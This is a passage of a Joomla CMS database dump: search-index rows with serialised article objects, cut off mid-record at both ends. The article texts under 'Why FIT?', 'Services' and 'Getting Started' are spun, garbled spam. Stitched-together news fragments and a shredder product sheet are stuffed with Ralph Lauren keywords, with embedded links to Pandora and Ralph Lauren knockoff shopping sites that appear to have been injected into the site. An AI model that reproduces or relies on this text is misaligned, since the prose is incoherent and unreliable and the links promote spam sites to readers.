7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:2:\"11\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:11:\"117:why-fit\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:62:\"index.php/about-us/why-fit/14-sample-data-articles/117-why-fit\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=117\";s:5:\"route\";s:97:\"index.php?option=com_content&view=article&id=117:why-fit&catid=14:sample-data-articles&Itemid=679\";s:5:\"title\";s:8:\"Why FIT?\";s:11:\"description\";s:2539:\"Snowmobile trails groomed at start of promising season Would you do it all again?Would absolutely do it all again.Being crowned hall of fame queen was an honor in every sense of the word.No other single event has opened the door to so many opportunities while serving as the starting point for numerous friendships and providing a platform to act as a role model to our young women. \"There\'s going to be a big hole that somebody\'s going to have to fill, and i don\'t know who\'s going to do it because nobody, at the moment, is set up like we were to do it,\"He said. \"Skowhegan people are wonderful people;I feel bad for the customers and for the help.I wish everyone Balfleet well. \". Wenger pas l du tout, et comme jean gounelle, j pas vraiment compris le rle de warner.Wallace a du chien et de la volont, reste mettre un peu d ldedans.On manque felipe, et il me semble qu aurait pu faire jouer valentin droite, non? . \"I am excited to support a veteran who knows the meaning of true service,\"Lemerand said. \"I\'m voting for craig because he\'s the only candidate in this race that comes from a business background and understands how jobs are created.Craig miller has a real record of accomplishment and isn\'t just another career politician. There was a morning trolley service with fresh baked goods and tea urns, there was no coffee as once rationing kicked in the trolley was a very sparse affair mainly tea and plain biscuits.There was a dining club on the top floor where only those of a higher grade usually ate.It had waitress service and the waitresses wore black dresses and white frilly aprons. When i said yes, i wasn\'t pregnant, or even thinking about pregnancy!Now i\'ll be 35wks pregnant when her big day gets here.I am having a heck of a time trying to find a dress!Maternity formal wear is already the corner of a niche market, then add modest on top of that?Yikes.It\'s tough!I need to find a modest, maternitydress, Balfleet Evening Dresses a little more formal, knee length, and navy blue. Military demonstrations take place in the afternoon.Research materials will be available to look up floyd county civil war connections and ancestor information.Donations will be accepted.Los angeles, feb.5, 2013 /PRNewswire/ it\'s the coldest time of the year and late spring and early summer might seem a million years away, but Prom 2013 and June weddings are far closer than you think.Don\'t wait to head straight over to the jovani web site to start ogling the selection of beautiful prom dresses for 2013 and dresses for weddings.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-03-15 05:38:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-03-15 05:38:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(126,'index.php?option=com_content&view=article&id=115','index.php?option=com_content&view=article&id=115:services&catid=14:sample-data-articles&Itemid=677','Services','Articles about souderton Articles about souderton Sporting goods, staff on dicing block in souderton Past melinda rizzo, big to the morning cal may 11, Where Do You Get Pandora Bracelets 2011 The souderton area school district is looking at eliminating a ','2015-06-29 22:47:52','41ef00a52e353da66c6c4ac40759a11b',1,1,1,'en-GB','2015-03-15 05:38:00','0000-00-00 00:00:00','2015-03-15 05:38:00','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"115\";s:5:\"alias\";s:8:\"services\";s:7:\"summary\";s:3246:\"<p>Articles about souderton <br /><br />Articles about souderton <br /><br />Sporting goods, staff on dicing block in souderton <br /><br />Past melinda rizzo, big to the morning cal may 11, <b><a title=\"Where Do You Get Pandora Bracelets\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Where Do You Get Pandora Bracelets</a></b> 2011 <br /><br />The souderton area school district is looking at eliminating a host of sports teams at the middle and high school graduation levels as it tries to shave almost $3 million in expenses to close a budget gap.Gone would be all junior high school junior varsity teams, adding <b><a title=\"Cheap Pandora Charms Canada\" href=\"http://www.milagrofilms.ca\">Cheap Pandora Charms Canada</a></b> girls field hockey, lacrosse, softball and tennis, and boys soccer, baseball, football, football and wrestling.Freshmen teams for football, field hockey, lacrosse, soccer and competitive recreational softball would go, just pretty.High school graduation winter track would end as well and there would be coaching cuts across all remaining sports.<br /><br />Superbly written expertly written content by date <br /><br />Tom housenick march 22, 2013 <br /><br />By ron kohl special to the morning call demonstrate winning the hard way.Quakertown high\'s football team beat souderton in double extra last friday night.Just when the panthers looked from it, out of the blue, they just wasn\'t.And when nick soriano\'s 20 yard field goal found its way within the uprights after the panther defense held souderton scoreless in the second overtime, quakertown finally had itself a 20 17 triumph.Not for, the panthers aren\'t going to win the suburban one ls conference title.<br /><br />Souderton thrift shop subscribers help haiti <br /><br />January 7, 2010 <br /><br />The concern share thrift shoppes matching gift of $10, 000 was met by customers, in excess of the goal by $1.02 for example betwen Jan.15 and as a result 22.An overall total of $20, 001.02 will be submitted to Mennonite Central Committee\'s Haiti earthquake relief effort.Mcc has been a reliable source in haiti, working beside the poorest people in the western hemisphere for over 50 years.Mcc is the help, production and peace agency of the mennonite and brethren in christ churches.Or even smy friend, even so, will not publicly reveal the starter until in a few days. \"I make sure i have a chance to talk to those three guys, morgans said during a break in friday\'s preparation.Junior nick zambelli and sophomores devante cross and nolan ridgway all earned first team reps during different points of the preseason.<br /><br />An 89 yr old new hope area man died friday of injuries he suffered in a two vehicle crash two months ago in souderton, the lehigh local coroner said.At good shepherd custom made hospital in bethlehem.Coroner scott grim said he died of ramifications from multiple blunt force injuries in the accident.But luke moyer isn\'t one of which.After watching tv a 17 point fourth quarter lead shrink to 63 61, moyer took be significant into his own hands.The rams ran just 12 takes on from scrimmage, but rattled off four touchdowns in rallying for a 35 25 suburban one ls conference victory over the big red.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-30 02:47:50\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:2:\"11\";s:8:\"ordering\";s:2:\"13\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:12:\"115:services\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:55:\"index.php/services/14-sample-data-articles/115-services\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=115\";s:5:\"route\";s:98:\"index.php?option=com_content&view=article&id=115:services&catid=14:sample-data-articles&Itemid=677\";s:5:\"title\";s:8:\"Services\";s:11:\"description\";s:2899:\"Articles about souderton Articles about souderton Sporting goods, staff on dicing block in souderton Past melinda rizzo, big to the morning cal may 11, Where Do You Get Pandora Bracelets 2011 The souderton area school district is looking at eliminating a host of sports teams at the middle and high school graduation levels as it tries to shave almost $3 million in expenses to close a budget gap.Gone would be all junior high school junior varsity teams, adding Cheap Pandora Charms Canada girls field hockey, lacrosse, softball and tennis, and boys soccer, baseball, football, football and wrestling.Freshmen teams for football, field hockey, lacrosse, soccer and competitive recreational softball would go, just pretty.High school graduation winter track would end as well and there would be coaching cuts across all remaining sports. Superbly written expertly written content by date Tom housenick march 22, 2013 By ron kohl special to the morning call demonstrate winning the hard way.Quakertown high\'s football team beat souderton in double extra last friday night.Just when the panthers looked from it, out of the blue, they just wasn\'t.And when nick soriano\'s 20 yard field goal found its way within the uprights after the panther defense held souderton scoreless in the second overtime, quakertown finally had itself a 20 17 triumph.Not for, the panthers aren\'t going to win the suburban one ls conference title. Souderton thrift shop subscribers help haiti January 7, 2010 The concern share thrift shoppes matching gift of $10, 000 was met by customers, in excess of the goal by $1.02 for example betwen Jan.15 and as a result 22.An overall total of $20, 001.02 will be submitted to Mennonite Central Committee\'s Haitiearthquake relief effort.Mcc has been a reliable source in haiti, working beside the poorest people in the western hemisphere for over 50 years.Mcc is the help, production and peace agency of the mennonite and brethren in christ churches.Or even smy friend, even so, will not publicly reveal the starter until in a few days. \"I make sure i have a chance to talk to those three guys, morgans said during a break in friday\'s preparation.Junior nick zambelli and sophomores devante cross and nolan ridgway all earned first team reps during different points of the preseason. An 89 yr old new hope area man died friday of injuries he suffered in a two vehicle crash two months ago in souderton, the lehigh local coroner said.At good shepherd custom made hospital in bethlehem.Coroner scott grim said he died of ramifications from multiple blunt force injuries in the accident.But luke moyer isn\'t one of which.After watching tv a 17 point fourth quarter lead shrink to 63 61, moyer took be significant into his own hands.The rams ran just 12 takes on from scrimmage, but rattled off four touchdowns in rallying for a 35 25 suburban one ls conference victory over the big red.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-03-15 05:38:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-03-15 05:38:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(128,'index.php?option=com_content&view=article&id=22','index.php?option=com_content&view=article&id=22:getting-started&catid=19:joomla&Itemid=435','Getting Started','Mens ralph lauren shorts sem model 3 disintegrator on book display units now polo ralph lauren hoodies women This mens ralph lauren pants sem model 3 disintegrator Has polo ralph lauren hoodies women been evaluated cheap polo ralph lauren accessorie by ns','2015-07-02 01:24:14','9e2cf1f5c4b34a508fa60bc24d31c015',1,1,1,'en-GB','2011-01-01 00:00:01','0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"22\";s:5:\"alias\";s:15:\"getting-started\";s:7:\"summary\";s:4095:\"<p>Mens ralph lauren shorts sem model 3 disintegrator on book display units now polo ralph lauren hoodies women <br /><br />This mens ralph lauren pants sem model 3 disintegrator <br /><br />Has polo ralph lauren hoodies women been evaluated cheap polo ralph lauren accessorie by nsa mens ralph lauren polo shirts outlet a lot of people wholesale polo ralph lauren mens hoodies standrad 3/32 screen, is introduced to the <br /><br />Ideal for wholesale womens ralph lauren polo shirts medium volume ralph lauren polo scarves devastation of paper, mens polo ralph lauren eye media and girls ralph lauren polo a <br /><br />Amount media polo ralph lauren sport shirt women in various waste ralph lauren men s hoodies particle sizes.Rated by the extensive mens ralph lauren long sleeve polo nsa at <br /><br />250 pounds per cheap ralph lauren polo handbags hr for High Security and up to 550 pounds ralph lauren polo bags for reasonable per hr for reasonable ralph lauren polo sport shirt for men Non <br /><br />Classified <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.ghezzispa.it\">Ralph Lauren Polo Italia</a></b> usages.Along with a cheap ralph lauren long sleeve for men a single bag air evacuation waste <br /><br />Specify system.Mens ralph lauren polo custom fit store appropriate ralph lauren womens sweaters room size ralph lauren classic fit polo for men for this equiptment:Large ralph lauren womens sweaters 10 cheap polo ralph lauren sport shirt for women d x <br /><br />7 W x 6 the exact SEM 3 Disintegrator <br /><br />Is polo ralph lauren shoes for men sale a genuine light / mid ralph lauren mens jackets duty disintegrator, rendering ralph lauren shorts men high volume <br /><br />Destruction well over 600 lbs/hr wholesale ralph lauren polo mens shorts(At wholesale prices womens ralph lauren polo up to 250 cheap polo ralph lauren shorts for men lbs per hr at nsa <br /><br />Authorized, levels)And minimal mens ralph lauren dress shirts outlet space wishes.Search engine optimization disintegrators <br /><br />Deploy solid steel rotors with 5/8 thick chef cutlery and 10 hold down bolts <br /><br />Per silverware.This design generates ralph lauren shoes for men greater spinning inertia resulting <br /><br />In stronger cutting system with polo ralph lauren womens hoodies outlet increased cutting power to handle <br /><br />Denser and larger volumes of items.Sem coined organizations <br /><br />Disintegrator over 40 cheap mens ralph lauren classic fit polo issue.Today we have <b><a title=\"Ralph Lauren Italia\" href=\"http://www.ghezzispa.it\">Ralph Lauren Italia</a></b> an overabundance units in ralph lauren long sleeve shirts for women use in <br /><br />More maximum security growing than any other company.Search engine marketing <br /><br />Disintegrators use proven rotary knife mill techniques to destroy <br /><br />Any type of bulk material.When used with adequate waste sizing <br /><br />Computer monitor, all sem disintegrators meet ralph lauren sandals for men what\'s needed of:Ralph lauren hooded sweatshirts womens nsa/css <br /><br />02 02 for the wrecking of paper, NSA/CSS ralph lauren long sleeve polo men 04 02 for the polo ralph lauren boys exploitation <br /><br />Of eye media, nsa/css 04 01 for the polo ralph lauren sweaters for men deterioration of boys ralph lauren polo shirts key tape.<br /><br />Ralph lauren sport shirt women ralph lauren females long sleeve polo 3 disintegrator <br /><br />Capacity at cheap ralph lauren men s sport shirt 1 particle ralph lauren polo for females size polo ralph lauren scarves store:600 LBS with regard to Hr <br /><br />Mens ralph lauren polo shirts facility mens polo ralph lauren dress shirts at 3/32 cheap ralph lauren women s sport shirt nsa approved:250 LBS by Hr <br /><br />Trimming system with ralph lauren polo for boys solid steel rotor:5 ralph lauren polo jewelry sale Blade Cutting System(3 windmill / 2 Bed)<br /><br />Polo ralph lauren womens shirts cutting chamber ralph lauren women dresses web feed opening:10 x ralph lauren women s sandals in jamaica 12 <br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"19\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:7:\"Joomla!\";s:8:\"modified\";s:19:\"2015-07-02 05:24:13\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"9\";s:8:\"category\";s:7:\"Joomla!\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:18:\"22:getting-started\";s:7:\"catslug\";s:9:\"19:joomla\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:59:\"index.php/19-sample-data-articles/joomla/22-getting-started\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:7:\"Joomla!\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Joomla!\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:7:\"Joomla!\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Joomla!\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=22\";s:5:\"route\";s:90:\"index.php?option=com_content&view=article&id=22:getting-started&catid=19:joomla&Itemid=435\";s:5:\"title\";s:15:\"Getting Started\";s:11:\"description\";s:3606:\"Mens ralph lauren shorts sem model 3 disintegrator on book display units now polo ralph lauren hoodies women This mens ralph lauren pants sem model 3 disintegrator Has polo ralph lauren hoodies women been evaluated cheap polo ralph lauren accessorie by nsa mens ralph lauren polo shirts outlet a lot of people wholesale polo ralph lauren mens hoodies standrad 3/32 screen, is introduced to the Ideal for wholesale womens ralph lauren polo shirts medium volume ralph lauren polo scarves devastation of paper, mens polo ralph lauren eye media and girls ralph lauren polo a Amount media polo ralph lauren sport shirt women in various waste ralph lauren men s hoodies particle sizes.Rated by the extensive mens ralph lauren long sleeve polo nsa at 250 pounds per cheap ralph lauren polo handbags hr for High Security and up to 550 pounds ralph lauren polo bags for reasonable per hr for reasonable ralph lauren polo sport shirt for men Non Classified Ralph Lauren Polo Italia usages.Along with a cheap ralph lauren long sleeve for men a single bag air evacuation waste Specify system.Mens ralph lauren polo custom fit store appropriate ralph lauren womens sweaters room size ralph lauren classic fit polo for men for this equiptment:Large ralph lauren womens sweaters 10 cheap polo ralph lauren sport shirt for women d x 7 W x 6 the exact SEM 3 Disintegrator Is polo ralph lauren shoes for men sale a genuine light / mid ralph lauren mens jackets duty disintegrator, rendering ralph lauren shorts men high volume Destruction well over 600 lbs/hr wholesale ralph lauren polo mens shorts(At wholesale prices womens ralph lauren polo up to 250 cheap polo ralph lauren shorts for men lbs per hr at nsa Authorized, levels)And minimal mens ralph lauren dress shirts outlet space wishes.Search engine optimization disintegrators/> Deploy solid steel rotors with 5/8 thick chef cutlery and 10 hold down bolts Per silverware.This design generates ralph lauren shoes for men greater spinning inertia resulting In stronger cutting system with polo ralph lauren womens hoodies outlet increased cutting power to handle Denser and larger volumes of items.Sem coined organizations Disintegrator over 40 cheap mens ralph lauren classic fit polo issue.Today we have Ralph Lauren Italia an overabundance units in ralph lauren long sleeve shirts for women use in More maximum security growing than any other company.Search engine marketing Disintegrators use proven rotary knife mill techniques to destroy Any type of bulk material.When used with adequate waste sizing Computer monitor, all sem disintegrators meet ralph lauren sandals for men what\'s needed of:Ralph lauren hooded sweatshirts womens nsa/css 02 02 for the wrecking of paper, NSA/CSS ralph lauren long sleeve polo men 04 02 for the polo ralph lauren boys exploitation Of eye media, nsa/css 04 01 for the polo ralph lauren sweaters for men deterioration of boys ralph lauren polo shirts key tape. Ralph lauren sport shirt women ralph lauren females long sleeve polo 3 disintegrator Capacity at cheap ralph lauren men s sport shirt 1 particle ralph lauren polo for females size polo ralph lauren scarves store:600 LBS with regard to Hr Mens ralph lauren polo shirts facility mens polo ralph lauren dress shirts at 3/32 cheap ralph lauren women s sport shirt nsa approved:250 LBS by Hr Trimming system with ralph lauren polo for boys solid steel rotor:5 ralph lauren polo jewelry sale Blade Cutting System(3 windmill / 2 Bed) Polo ralph lauren womens shirts cutting chamber ralph lauren women dresses web feed opening:10 x ralph lauren women s sandals in jamaica 12/>\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2011-01-01 00:00:01\";s:16:\"publish_end_date\";s:19:\"0000-00-00 